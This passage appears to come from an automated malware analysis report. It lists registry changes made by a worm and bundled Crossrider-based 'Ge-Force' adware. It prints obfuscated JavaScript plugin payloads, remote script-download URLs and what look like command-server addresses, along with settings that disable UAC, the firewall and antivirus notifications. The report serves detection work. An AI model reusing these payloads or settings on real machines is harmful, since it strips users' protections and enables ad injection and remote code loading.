mMyNTJjMmQzYzJjMjAzYzM3MjMzNjJlMjAyNzI3MzY0YjBmNGExYzA3NGUxOTBhMWM1NDU1NTM1ZDQyNTIxNDExMTc0NTM2M2IyMDM2MzkyNzIyM2IyYTNjMmMzNjNjMjUyNjI0MmUyNzIyMzUyYzNiM2M0MjA1MGQwMjFkMDYxNTAwMDA1ZTNiMjkzNzIzMjYzMDJiM2IyZDI3MjEyNDJiMzgyNzMwMmMyODI4MmYyMTI0MmIyNDNhMjYyYTM2MmQyNzNiMjk1NjVkNjM0MzU4NDk0NDQxMTQxYTAxMTY"
[HKCU\Software\Ge-Force\Plugins\94]
"Version" = "2"
[HKCU\Software\Ge-Force\Plugins\253]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MGU2MDdmNDgwNTEyMTUxYjM0MTgxOTQ4NGM0YTRmMzkzZTI4MzMzNTIwM2EzMjJiMzkyMzNlMjMyZTM5MjEzNTI5NDUwZjBmNGUwYTRmMDAwNjQ4NWE2MDY0NDQxMTA3MTQwZDFjMDQzZjBlNGY1YzQxNTk1NDU5NTk2MDdmNDgwNDA4MGQwMjBmMGYzZjM5NTQ1MDRkNDQxNjAyMGYwZTFhMWQ1ODM1MzIwNDA4MzQxMTAzMGQwZjFhMzUxODE0MGQzNDNlNGE0ODRhNTEzNTMyMjUzMzM0MzIzZTM0M2UyNTM1MjUyOTMyM2YzZTM1NWEwODFmNDQwYTBmMDc1NDAyMGIxODFhMTcwMzBhMDg1YzM0M2UyOTI3MjUyNTM5M2YyZjI1MmUzMzM1MzYyYjNiM2EzMjJmMjUzNDNlNGMxNzE4MTkxZDFlMDMxMzU2M2UzNTM2MzgzOTM5M2UzNDI4MmYyNDM4MmEyODI0MjUzYTM1MjQzOTNlMzU1MzA4MWYwOTUwMzkzZTI4MzMyNTI2MzkyNDIzMjkyMzMzMzQzNDM5MzAzODI5MjMyOTM5M2U0ZDEzMDQxMTU3NTE0YTQ2NDY0OTA1MDQxZDU1MmUxNzFlMDg0ZTQ4NDI0ZjBkMTAxZTIyMDMwMDAzNDk0MjVhNDg3ZjE3', 'ujvjmfakaj'); }"
[HKCU\Software\Ge-Force\Plugins\46]
"JavaScript" = "if(typeof appAPI===undefined){appAPI={};appAPI.internal={};appAPI.internal.callbacks={};}else{if(typeof appAPI.internal===undefined){appAPI.internal={};appAPI.internal.callbacks={};}else{if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}}}appAPI.internal.callbacks.timersListeners={};appAPI.internal.callbacks.timersIsInterval={};appAPI.internal.callbacks.timer=function(b){var a=b.timerId;if(typeof a!==number){return;}if(typeof appAPI.internal.callbacks.timersListeners[a]===undefined){return;}var d=appAPI.internal.callbacks.timersListeners[a];if(!appAPI.internal.callbacks.timersIsInterval[a]){clearInterval(a);delete appAPI.internal.callbacks.timersListeners[a];delete appAPI.internal.callbacks.timersIsInterval[a];}try{d();}catch(c){console.error(setInterval/setTimeout - Caught an exception from user callback: (typeof c.message===string?c.message:???));}};(function(a){appAPI.setInterval=function(d,c,e){if((typeof d!==undefined)&&(typeof c===number)){var b=a.setIn@"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 13 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{8769e10b-79b7-42b2-9658-9540187841f5}]
"AppPath" = "%Program Files%\Ge-Force"
[HKCU\Software\Ge-Force\Plugins\1]
"Version" = "11"
[HKLM\SOFTWARE\Crossrider]
"Verifier" = "7d6635bb3acc762051a59407230a02ec"
[HKCU\Software\Ge-Force\Plugins\42]
"JavaScript" = "var Consts={SCOPE:{BACKGROUND:0,PAGE:1,POPUP:5,OPEN_URL:6}};if(typeof appAPI===undefined){appAPI={};}appAPI.__should_activate_validation__=true;(function(a){if(typeof window==undefined){window={};}if(typeof window.document===undefined){window.document={};document=window.document;}if(typeof window.alert===undefined){window.alert=function(b){var c;if(typeof b===undefined){c=undefined;}else{if(b===null){c=null;}else{c=b.toString();}}if(typeof c===string){a.alert(c);}};alert=window.alert;}})(appAPIinternal);if(typeof console===undefined){window.console={};console=window.console;}if(typeof console.log===undefined){window.console.log=function(a){};console.log=window.console.log;}if(typeof console.info===undefined){window.console.info=function(a){};console.info=window.console.info;}if(typeof console.warn===undefined){window.console.warn=function(a){};console.warn=window.console.warn;}if(typeof console.error===undefined){window.console.error=function(a){};console.error=window.console.error;)"
[HKCU\Software\Ge-Force\Plugins\44]
"Version" = "6"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Ge-Force\Plugins\242]
"Name" = "price_gong_m"
[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\,"
[HKCU\Software\Ge-Force\Manifest]
"AddressbarURL" = "NA"
[HKCU\Software\Ge-Force\Plugins\78]
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/78.js"
[HKCU\Software\Ge-Force\Plugins\17]
"JavaScript" = "if(typeof window!==undefined){/*! * jQuery JavaScript Library v1.4.2 * http://jquery.com/ * * Copyright 2010, John Resig * Dual licensed under the MIT or GPL Version 2 licenses. * http://jquery.org/license * * Includes Sizzle.js * http://sizzlejs.com/ * Copyright 2010, The Dojo Foundation * Released under the MIT, BSD, and GPL Licenses. * * Date: Sat Feb 13 22:33:48 2010 -0500 */var $$jquery;(function(aO,D){var a=function(e,a0){return new a.fn.init(e,a0);},o=aO.jQuery,S=aO.$,ac=aO.document,Y,Q=/^[^)[^>]*$|^#([\w-] )$/,aY=/^.[^:#\[\.,]*$/,az=/\S/,N=/^(\s|\u00A0) |(\s|\u00A0) $/g,f=/^(?:)?$/,b=navigator.userAgent,v,L=false,af=[],aI,av=Object.prototype.toString,ar=Object.prototype.hasOwnProperty,h=Array.prototype.push,G=Array.prototype.slice,t=Array.prototype.indexOf;a.fn=a.prototype={init:function(e,a2){var a1,a3,a0,a4;if(!e){return this;}if(e.nodeType){this.context=this[0]=e;this.length=1;return this;}if(e===body&&!a2){this.context=ac;this[0]=ac.body;this.seÇÂÂ"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKCU\Software\Ge-Force\Plugins\183]
"Name" = "tabsWrapper"
[HKCU\Software\Ge-Force\Installer]
"FullVersionForUrl" = "1_35_12_18"
[HKCU\Software\Ge-Force\Plugins\223]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MDI3ZDc5NTUxMjA1MGQxYzI0MDgxNTU1NGE1NzU4MTkwZDE4MDE0MDU2NTgxMzEzMTQ1ZjBmMDUwMjFiMWQxMzVlMTQxNTFjNTYxZjEyMDgxMDA3MDQ1ODRiNDU0YzVhNDY0ZDRiNDI0NzQxNGY1ZTA5MWUxNDE2MTYxNjE0NTkxMDAyNDYxZjA0MTgxMDEzNGQyODI1MzIyYjIzMjIyOTJiM2UzNDMyMjgyZTNjMzQyNTNmMzczMzM1MzMyNTIyMmMyZTJlMzMzZDI4MmY1MTBmMWM0NDMzMmUzOTJiMzgyMzI0MjgzODNkMjkyMzI1MzgyNzIwMjgzNDMwMzQyOTJlMjU1YjViN2E3ZTU4MTkwZDE4MDEwOTJjMDUxYzU1NDA1MTViMDQwNTBlMDkwNDRhNTg1NTEyMWQwMjVmMGMxMDA0MTExMzFlNWYxYTAzMWM1NTBhMTQwMjFlMGEwNTU2NWQ0NTRmNGY0MDQ3NDU0ZjQ2NGY1OTVlMGEwYjEyMWMxODFiMTU1NzA2MDI0NTBhMDIxMjFlMWU0YzI2MzMzMjI4MzYyNDIzMjUzMzM1M2MzZTJlM2YyMTIzMzUzOTNlMzQzZDMzMjIyZjNiMjgzOTMzMjUyZTVmMTkxYzQ3MjYyODMzMjUzNTIyMmEzZTM4M2UzYzI1MmYzNjJhMjEyNjIyMzAzNzNjMjgyZjU1NTY3YjcwNGUwMTE2MGMxMDE5MTkzMzE1NWI1NjUxNDg0YjQ0N2EwYQ==', 'ywpwzqylqz'); }"
[HKCU\Software\Ge-Force\Plugins\200]
"Version" = "4"
[HKCU\Software\Ge-Force\Plugins\64]
"Name" = "appApiMessage"
[HKCU\Software\Ge-Force\Plugins\4]
"Version" = "5"
[HKCU\Software\Ge-Force\Manifest]
"Manifest" = "NA"
[HKCU\Software\Ge-Force\Update]
"LastCheck" = "1421039414"
[HKCU\Software\Ge-Force\Plugins\123]
"Name" = "intext_adv_m"
[HKLM\SOFTWARE\Ge-Force\IE]
"TotalProfiles" = "1"
[HKCU\Software\InstalledBrowserExtensions\21836\Status]
"Installed" = "1"
[HKCU\Software\Ge-Force\Plugins\182]
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/182.js"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EF 1E DD DC A6 3D CB 28 91 69 85 29 DA 0B A4 28"
[HKCU\Software\Ge-Force\Plugins\37]
"Name" = "IEBrowserEvents"
[HKCU\Software\Ge-Force\Plugins\1]
"Name" = "base"
[HKCU\Software\Ge-Force\Plugins\102]
"Version" = "11"
[HKCU\Software\Ge-Force\Plugins\45]
"JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}appAPI.tabId=onRequest;window.console.log=appAPI.internal.console.log;console.log=window.console.log;window.console.info=appAPI.internal.console.info;console.info=window.console.info;window.console.warn=appAPI.internal.console.warn;console.warn=window.console.warn;window.console.error=appAPI.internal.console.error;console.error=window.console.error;(function(){function a(e){var c=appAPI.internal.prefs.getChar(e,Crossrider\\onRequest);if(typeof c!==string){return 0;}if(c.length===0){return 0;}c=appAPI.JSON.parse(c);if(typeof c!==object){return 0;}var d=0;for(var b in c){d ;appAPI.internal.callbacks.addListener(onRequest,function(m,g){var n=appAPI.internal.callbacks.onRequest.listenersAdditionalData[g];if(typeof n.code!==string){return;}var f={};var i;if(typeof n.value===undefined){i=undefined;}else{if(n.value===nÉ»"
[HKCU\Software\Ge-Force\Plugins\91]
"JavaScript" = "(function(M){var A=[].slice;var z={};var a=function(ar){if(typeof ar==string&&typeof ar.trim==function){return ar.trim();}return ar==null?:ar.toString().replace(/^\s /,).replace(/\s $/,);};function f(ar){var at=z[ar]={},au,av;ar=ar.split(/\s /);for(au=0,av=ar.length;au
[HKCU\Software\Ge-Force\Plugins\102]
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/102.js"
[HKCU\Software\Ge-Force\Plugins\221]
"Version" = "4"
[HKCU\Software\Ge-Force\Installer]
"CodeDownloadDomain" = "http://js.newstatsclientcloud.com"
[HKCU\Software\Ge-Force\Code]
"BgJavaScript" = "/************************************************************************************ This is your background code. For more information please visit our wiki site: http://docs.crossrider.com/#!/guide/scopes_background*************************************************************************************/appAPI.ready(function($) { // Place your code here (ideal for handling browser button, global timers, etc.)});"
[HKCU\Software\Ge-Force\Manifest]
"Description" = "Ge-Force"
[HKCU\Software\Ge-Force\Plugins\262]
"Version" = "2"
[HKCU\Software\Ge-Force\Plugins\7]
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/7.js"
[HKCU\Software\Ge-Force\Plugins\45]
"Version" = "4"
[HKCU\Software\Ge-Force\Plugins\13]
"Name" = "CrossriderAppUtils"
[HKCU\Software\Ge-Force\Plugins\64]
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/64.js"
[HKCU\Software\Ge-Force\Plugins\22]
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/22.js"
[HKCU\Software\Ge-Force\Plugins\123]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MGQ3ZDZmNDAwNDBjMTkxNDMxMGExYTU1NWM0MjRlMTAxOTEwMTQ0MjU5NTgwZjBjMTgxZDE1MTA0YTE2MTcwMTRiMGUwNTE2MDYxNzRhMWIxOTFhNDkwODFmNTcwNDBhMTAxZDBlMDM0ODA4MWY0NzBjMDIwZDFjNGIxNDE0MGQxZjBiMWYwZDAwMWQwNDUxMTUxNzBlMTEwOTU5M2IyNzM1MjUyOTMxM2YyYTI0MjAyMTJhMjkzMjNlMzYyOTM2MjkyMTIwMjcyNTIyMjQzZDI1M2MzMjNiNDIxNTE3MGYwYTBiMDIxMzFlNTk1YzVlMWExZTA4MDkwZjE3MDEwYjE2NDU0NjQ3NTY1MjJhM2U0YjA2MTYxOTE4MTM1YjNkMzMzYjNmMmIzNzJiMjQzZTIyMjczZTI3MmMzNDM0MjczODM2MmIyNzMzMjc0ZjQ4NmU3MTU0MWYxMjE2MWMwYjM4MTYwODVhNGM1NzQ0MGExODBjMWQxNzVlNTc1OTFlMDgxNjA5MDAxOTRhMGExOTAwNWEwYTBiMDIxMzFlNGEwNzE3MWI1ODBjMTE0MzExMDMxMDAxMDAwMjU5MGMxMTUzMTkwYjBkMDA0NTE1MDUwOTExMWYwYTA0MDAwMTBhNTAwNDEzMDAwNTFjNTAzYjNiM2IyNDM4MzUzMTNlMzEyOTIxMzYyNzMzMmYzMjI3MjIzYzI4MjAzYjJiMjMzNTM5MmIyODI3MzI0MjA5MTkwZTFiMGYwYzA3MGI1MDVjNDIxNDFmMTkwZDAxMDMxNDAyMTY1OTQ4NDY0NzU2MjQyYTVlMGYxNjA1MTYxMjRhMzkzZDJmMmEyMjM3MzcyYTNmMzMyMzMwMzMzOTNkMzQzYjM2MzczYTIzM2QzMzVhNDE2ZTZkNWEwNjFiMTMwNTA1MTYyNDAwNDY0MjU2NDY1NDUxNjYwNQ==', 'vwfblxmddx'); }"
[HKCU\Software\Ge-Force\Plugins\40]
"JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}appAPI.internal.scope=Consts.SCOPE.PAGE;appAPI.internal.callbacks.setEventHandler(externalConsole,function(a){if(appAPI.dom.isIframe()){return;}var c=a.level;var b=a.text;if(typeof c===undefined){console.error(Received undefined Background console level);return;}if(typeof console[c]===undefined){console.error(Received undefined Background console level);return;}if(typeof b===undefined){console.error(Received undefined Background console text);return;}console[c](b);});appAPI.internal.callbacks.setEventHandler(onBeforeNavigate,function(a){});appAPI.internal.callbacks.setEventHandler(windowOpen,function(a){if(appAPI.dom.isIframe()||!appAPI.isActiveTab()){return;}window.open(a.url,a.name,a.specs,a.replace);});try{if(!appAPI.dom.isIframe()){appAPI.internal.activeTabCounter=0;setInterval(function(){if(appAPI.isActi)"
[HKCU\Software\Ge-Force\Plugins\253]
"Name" = "pixel_inject"
[HKCU\Software\Ge-Force\Plugins\46]
"Name" = "IETimers"
[HKCU\Software\Ge-Force\Plugins\354]
"Name" = "categories"
[HKCU\Software\Ge-Force\Plugins\220]
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/220.js"
[HKCU\Software\Ge-Force\Plugins\345]
"Name" = "pluginsVerticals"
[HKCU\Software\Ge-Force\Plugins\91]
"Name" = "monetizationLoader.js"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Ge-Force]
"Publisher" = "iWebar"
[HKCU\Software\Ge-Force\Plugins\9]
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/9.js"
[HKCU\Software\Ge-Force\Plugins\2]
"Name" = "ie8_fix_1"
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/2.js"
[HKCU\Software\Ge-Force\Plugins\38]
"JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}appAPI.internal.callbacks.genericEvent=function(e){var d=e.eventContent;if(typeof d===undefined){return;}var a=e.eventName;if(typeof a===undefined){return;}if(typeof appAPI.internal.callbacks[a]===undefined){return;}if(typeof appAPI.internal.callbacks[a].handler!==undefined){var b=appAPI.internal.callbacks[a].handler(d);if(b){return;}}if(typeof appAPI.internal.callbacks[a].listeners===undefined){return;}for(var c in appAPI.internal.callbacks[a].listeners){appAPI.internal.callbacks[a].listeners[c](d,c);}};appAPI.internal.callbacks.addListener=function(b,a,c){if(typeof appAPI.internal.callbacks[b]===undefined){appAPI.internal.callbacks[b]={};appAPI.internal.callbacks[b].listeners={};appAPI.internal.callbacks[b].listenersAdditionalData={};appAPI.internal.callbacks[b].listenersIds=0;appAPI.internal.callbacks[b].numberO"
[HKCU\Software\Ge-Force\Plugins\42]
"Version" = "10"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKCU\Software\Ge-Force\Plugins\350]
"Version" = "1"
[HKCU\Software\Ge-Force\Plugins\47]
"JavaScript" = "(function(){appAPI.ready=function(a){appAPI.resources.isReady(a);};}());var CrossRiderResourcesManager=(function(){var C={appId:(function(){var D=appAPI.appInfo;if(D){return appAPI.appInfo.id;}else{return appAPI.appID;}})(),url:{base:{production:[""\x68\x74\x74\x70\x3a\x2f\x2f\x72\x65\x73\x6f""
[HKCU\Software\Ge-Force\Plugins\220]
"Name" = "icm_base_m"
[HKCU\Software\Ge-Force\Plugins\242]
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/242.js"
[HKCU\Software\Ge-Force\Plugins\14]
"Name" = "CrossriderUtils"
[HKCU\Software\Ge-Force\Plugins\123]
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/123.js"
[HKCU\Software\Ge-Force\Plugins\184]
"Version" = "10"
[HKCU\Software\Ge-Force\Plugins\4]
"Name" = "jquery_1_7_1"
[HKCU\Software\Ge-Force\Plugins\195]
"Name" = "icm_convertmedia_m"
[HKCU\Software\Ge-Force\Plugins\102]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MDI2NzUxNTI0MjUyNGUwYzA0MWUwOTM4MDMxZTQwNDg0YzQ2MTgxZTBkMWQ0YjVkNGQxYjQyMDcwMjA4MWYwNzAyNWMwYjFjMGEwYjVmMDkwYjBmMTc1ZDA4MTMxYTA1MDMwOTBiMDQwMTA2NGMxODFmNWIxMzAyMTgwMzFmMTcwZTRmMGYxNjE0MTgyNjMyMmUzMTMwM2QzZjM3MjIyMzNkMjgyMzJkMjcyYTM4MjEzZTJlM2MyOTJlMjEzNzMwMzMyZDM0MzUyNjRiMTAwMjEyMjYwNTEwMWMwZjQ0MzIyZTMxMzAzZDNmMzcyMjIzM2QyODIzMmQyMzIyM2MzYjNlMmIzNDI4MmUyZDQ0MWEwNTAwNGQzNTI2MmUyMzNkMzEyMTNlMmQzNDJmMmIzMjI0MjEyNzIwMzMyZDM0MzUyNjRmNWQ3ODQyNTI0YzQ0NTIwMjBkMTkwMTAxMzcwMDAwNDY0YTRhNWIwNTA1MDYxMjAxNTY0YjVmMDMyNjBlMDMxMDA0MTgxZjNiMTkwNDFmMDI1ZjA2MGUwMTBmMDAxZTQ0MWEwMjFjNWQwMTAwMGUwMjVmMDAxODFiMTAwMTAxMDAwNTE0MDQ0NDEzMWU0ZTExMGExMzAyMGExNTA2NDQwZTAzMTYxMDJkMzMzYjMzMzgzNjNlMjIyMDJiMzYyOTM2MmYyZjIxMzkzNDNjMjYzNzI4M2IyMzNmM2IzMjM4MzYzZDJkNGEwNTAwMWEyZDA0MDUxZTA3NGYzMzNiMzMzODM2M2UyMjIwMmIzNjI5MzYyZjJiMjkzZDJlM2MyMzNmMjkzYjJmNGMxMTA0MTU0ZjNkMmQyZjM2M2YzOTJhM2YzODM2MjcyMDMzMzEyMzJmMmIzMjM4MzYzZDJkNGU0ODdhNGE1OTRkNTE1MDEyMWUxOTAzMTkwNDMwMDk1MzQ4NDI0MzVjNTY3YTE3', 'ymqrbrldpj'); }"
[HKCU\Software\Ge-Force\Manifest]
"SetNewTab" = "false"
[HKCU\Software\Ge-Force\Plugins\64]
"JavaScript" = "(function(){var j=__CR_EMPTY_CHANNEL__;var d=function(e){return(typeof e===object&&e!==null);};var b=function(e){return(!!e&&typeof e===string);};var f=function(l){var e;if(typeof l===function){e=j;}else{if(d(l)&&b(l.channel)){e=l.channel;}else{e=j;}}return e;};var k=function(m,e){var l={wrapperMessage:{message:m,channel:f(e)},toIframes:d(e)?e.toIframes:e};return l;};var i=function(m,e){var l={message:m,channel:f(e)};return l;};var h=function(){var e={};e.addListener=appAPI.message.addListener;e.removeListener=appAPI.message.removeListener;e.toActiveTab=appAPI.message.toActiveTab;e.toAllOtherTabs=appAPI.message.toAllOtherTabs;e.toAllTabs=appAPI.message.toAllTabs;e.toBackground=appAPI.message.toBackground;e.toCurrentTabIframes=appAPI.message.toCurrentTabIframes;e.toCurrentTabWindow=appAPI.message.toCurrentTabWindow;e.toPopup=appAPI.message.toPopup;return e;};var a=function(e){appAPI.message.addListener=function(l,o){var n=null;var m;var p=f(l);if(typeof l===function){n=function(q){if(p===q.channel){e"
[HKCU\Software\Ge-Force\Manifest]
"ThanksUrl" = "NA"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{9eeb51b4-fe68-4297-af9a-8d5f04c3f631}]
"AppPath" = "%Program Files%\Ge-Force"10?0>0>0?0:>
The Worm modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"
The Worm modifies IE settings for security zones to map all urls to the Intranet Zone:
"IntranetName" = "1"
The Worm modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
"UNCAsIntranet" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Worm deletes the following registry key(s):
[HKCU\Software\Ge-Force\Plugins\301]
[HKCU\Software\Ge-Force\Plugins\263]
[HKCU\Software\Ge-Force\Plugins\242]
[HKCU\Software\Ge-Force\Plugins\184]
[HKCU\Software\Ge-Force\Plugins\183]
[HKCU\Software\Ge-Force\Plugins\182]
[HKCU\Software\Ge-Force\Plugins\246]
[HKCU\Software\Ge-Force\Plugins\180]
[HKCU\Software\Ge-Force\Plugins\104]
[HKCU\Software\Ge-Force\Plugins\2]
[HKCU\Software\Ge-Force\Plugins\223]
[HKCU\Software\Ge-Force\Plugins\220]
[HKCU\Software\Ge-Force\Plugins\207]
[HKCU\Software\Ge-Force\Plugins\200]
[HKCU\Software\Ge-Force\Plugins\93]
[HKCU\Software\Ge-Force\Plugins\91]
[HKCU\Software\Ge-Force\Plugins\94]
[HKCU\Software\Ge-Force\Plugins\221]
[HKCU\Software\Ge-Force\Plugins\177]
[HKCU\Software\Ge-Force\Plugins\345]
[HKCU\Software\Ge-Force\Plugins\72]
[HKCU\Software\Ge-Force\Plugins\17]
[HKCU\Software\Ge-Force\Plugins\14]
[HKCU\Software\Ge-Force\Plugins\38]
[HKCU\Software\Ge-Force\Plugins\13]
[HKCU\Software\Ge-Force\Plugins\78]
[HKCU\Software\Ge-Force\Plugins\35]
[HKCU\Software\Ge-Force\Plugins\36]
[HKCU\Software\Ge-Force\Plugins\37]
[HKCU\Software\Ge-Force\Plugins\43]
[HKCU\Software\Ge-Force\Plugins\39]
[HKCU\Software\Ge-Force\Plugins\64]
[HKCU\Software\Ge-Force\Plugins\273]
[HKCU\Software\Ge-Force\Plugins\41]
[HKCU\Software\Ge-Force\Plugins\40]
[HKCU\Software\Ge-Force\Plugins\192]
[HKCU\Software\Ge-Force\Plugins\42]
[HKCU\Software\Ge-Force\Plugins\253]
[HKCU\Software\Ge-Force\Plugins\195]
[HKCU\Software\Ge-Force\Plugins\47]
[HKCU\Software\Ge-Force\Plugins\44]
[HKCU\Software\Ge-Force\Plugins]
[HKCU\Software\Ge-Force\Plugins\46]
[HKCU\Software\Ge-Force\Plugins\354]
[HKLM\SOFTWARE\Tempo]
[HKCU\Software\Ge-Force\Plugins\286]
[HKCU\Software\Ge-Force\Plugins\281]
[HKCU\Software\Ge-Force\Plugins\4]
[HKCU\Software\Ge-Force\Plugins\7]
[HKCU\Software\Ge-Force\Plugins\9]
[HKCU\Software\Ge-Force\Plugins\1]
[HKCU\Software\Ge-Force\Plugins\123]
[HKCU\Software\Ge-Force\Plugins\3]
[HKCU\Software\Ge-Force\Plugins\28]
[HKCU\Software\Ge-Force\Plugins\22]
[HKCU\Software\Ge-Force\Plugins\21]
[HKCU\Software\Ge-Force\Plugins\45]
[HKCU\Software\Ge-Force\Plugins\102]
The Worm deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process %original file name%.exe:1616 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Security Center]
"UacDisableNotify" = "1"
[HKCU\Software\Aas]
"a1_0" = "2892445252"
[HKCU\Software\Aas\695404737]
"35845605" = "476"
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
"DoNotAllowExceptions" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system]
"EnableLUA" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"GlobalUserOffline" = "0"
[HKCU\Software\Aas\695404737]
"50183847" = "83AD022F944CCF21DDECD41871254667172BA39F3E949513F4CC29B07060AC534912E5BCB155880C2C4326E6FB83E6FA099D4219F6885291D527824C5507229614A07CE2AF035D97263FF7F26AD2ACC9D5D4395D4B8B3109DC5C0C87B31A1505E6E94E08EF20E71B91B96D3856F531DADFD78A894AD6A6C177136C5657B01661"
"43014726" = "0C00687474703A2F2F7777772E6C656479617A696C696D2E636F6D2F6C6F676F2E67696600687474703A2F2F6B73616E64726166617368696F6E2E636F6D2F6C6F676F2E67696600687474703A2F2F7777772E6C6166796572692E636F6D2F696D616765732F6C6F676F2E67696600687474703A2F2F6B756C7070617375722E636F6D2F6C6F676F2E67696600687474703A2F2F746F616C6C616465706170656C2E636F6D2E61722F696D616765732F6C6F676F2E67696600687474703A2F2F7777772E65636F6C652D7361696E742D73696D6F6E2E6E65742F696E6465785F746F702F6C6F676F2E67696600687474703A2F2F6C617A617265612E726F2F696D616765732F6C6F676F2E67696600687474703A2F2F6B6F6F6E6164616E6365322E636F6D2F696D616765732F6C6F676F2E67696600687474703A2F2F6B75706C752E62656C2E74722F696D616765732F6C6F676F2E67696600687474703A2F2F7777772E6C69646572616E636173706F6C6974696361732E636F6D2E62722F6C6F676F2E67696600687474703A2F2F7777772E6C6567616C62696C676973617961722E636F6D2F696D672F6C6F676F2E67696600687474703A2F2F6C696665636F6D32342E636F2E63632F696D616765732F6C6F676F2E676966"
[HKCU\Software\Aas]
"a3_0" = "17001001"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Security Center]
"AntiVirusOverride" = "1"
[HKLM\SOFTWARE\Microsoft\Security Center\Svc]
"UpdatesDisableNotify" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Security Center]
"FirewallOverride" = "1"
[HKCU\Software\Aas\695404737]
"14338242" = "0"
"7169121" = "144"
"21507363" = "0"
"28676484" = "35"
[HKLM\SOFTWARE\Microsoft\Security Center\Svc]
"UacDisableNotify" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"Hidden" = "2"
[HKLM\SOFTWARE\Microsoft\Security Center\Svc]
"FirewallOverride" = "1"
[HKLM\SOFTWARE\Microsoft\Security Center]
"FirewallDisableNotify" = "1"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FE 11 4A 0A 6F 3A B0 B9 41 F5 E0 2F F6 BF 6A BE"
[HKCU\Software\Aas]
"a2_0" = "7005"
[HKLM\SOFTWARE\Microsoft\Security Center\Svc]
"FirewallDisableNotify" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Security Center]
"UpdatesDisableNotify" = "1"
[HKCU\Software\Aas]
"a4_0" = "0"
[HKLM\SOFTWARE\Microsoft\Security Center\Svc]
"AntiVirusOverride" = "1"
Adds a rule to the firewall Windows which allows any network activity:
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\c:]
"%original file name%.exe" = "c:\%original file name%.exe:*:Enabled:ipsec"
Firewall notifications are disabled:
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
"DisableNotifications" = "1"
Antivirus notifications are disabled:
[HKLM\SOFTWARE\Microsoft\Security Center]
"AntiVirusDisableNotify" = "1"
[HKLM\SOFTWARE\Microsoft\Security Center\Svc]
"AntiVirusDisableNotify" = "1"
A firewall is disabled:
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
"EnableFirewall" = "0"
The process mscorsvw.exe:172 makes changes in the system registry.
